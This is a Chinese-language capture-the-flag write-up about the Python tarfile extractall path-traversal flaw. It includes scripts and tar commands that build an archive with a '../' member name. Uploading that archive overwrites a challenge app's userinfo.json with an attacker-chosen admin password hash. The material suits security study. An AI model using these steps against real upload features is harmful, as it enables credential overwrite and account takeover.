前言

做到[NSSRound#6 Team]check(Revenge)发现tar文件覆盖,但是对概念执行过程理解不够深就光光记住脚本,所以在做本题[NSSRound#7 Team]新的博客时打算重新梳理该漏洞执行过程

原理

Pythontarfile 模块中的extractextractFile和extractall 函数中的目录遍历漏洞 允许 用户协助的远程攻击者通过 TAR 存档文件名中的…和/遍历目录写入/覆盖任意文件

关键代码

tar = tarfile.open(file_save_path, "r")
tar.extractall(app.config['UPLOAD_FOLDER'])

extractall函数如果结合包含…/的文件名可以实现文件覆盖漏洞

例题 [NSSRound#7 Team]新的博客

打开题目发现两个跳转网页
第一个提示要用admin用户登录但是密码经过sha512加密然后就是泄露源码地址
在这里插入图片描述第二个网页提示hacker打不开,那么应该是要admin才行

我们字符串解码一下
在这里插入图片描述得到源码文件夹,文件结构大概如下
在这里插入图片描述
当然此文件夹给了加密后的密码,但是也提示我们不用去爆破
这里我们先随便注册用户1试试,发现存在tar文件上传
在这里插入图片描述
提示也说了这个恢复备份用的,那么思路就是tar文件覆盖

方法一 手搓文件名

我们已知userinfo.json存放着用户和加密的密码,那么我们可以尝试自己加密123456去覆盖admin原本的密码从而实现登录加密脚本如下

import hashlib
import json

password='123456'
with open('userinfo.json','wb') as file:
    file.write(json.dumps({'admin':hashlib.sha512(password.encode('utf-8')).hexdigest()}).encode('utf-8'))

我们覆盖的路径/app/conf/userinfo.json,但是我们发现目录穿越

因为我们以用户1登录后,参考前文给的文件结构可知道需要被覆盖路径1/../../app/conf/userinfo.json,也就是说我们创建文件名1/../../app/conf/userinfo.json。在linux构建文件夹结构,然后将上述脚本生成userinfo.json进行tar压缩

tar -czvf upload.tar.gz userinfo.json

然后我们在userData文件夹下,执行tar命令构造出覆盖路径的文件名

tar cPzvf upload.tar.gz 1/../../conf/userinfo.json

在这里插入图片描述

方法python脚本

import os, hashlib, json
 
username = '1' # 你注册时用的用户名,尽量别有奇怪的符号
admin_passwd = '123456' # 之后要使用admin账户登陆时的密码
 
os.makedirs('conf')
os.makedirs(os.sep.join([os.getcwd(), 'userData', username]))
with open(os.sep.join([os.getcwd(), 'conf', 'userinfo.json']), 'wb') as tFile:
    tFile.write(json.dumps({'admin': hashlib.sha512(admin_passwd.encode('utf-8')).hexdigest()}).encode('utf-8'))
userDataDir = os.sep.join([os.getcwd(), 'userData'])
os.system(f'cd "{userDataDir}" && tar cPzvf upload.tar.gz {username}/../../conf/userinfo.json')

然后我们登录用户1,上传生成的tar文件
然后退出,用密码123456登录即可得到flag
在这里插入图片描述

原文地址:https://blog.csdn.net/m0_73512445/article/details/134752281

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_30388.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注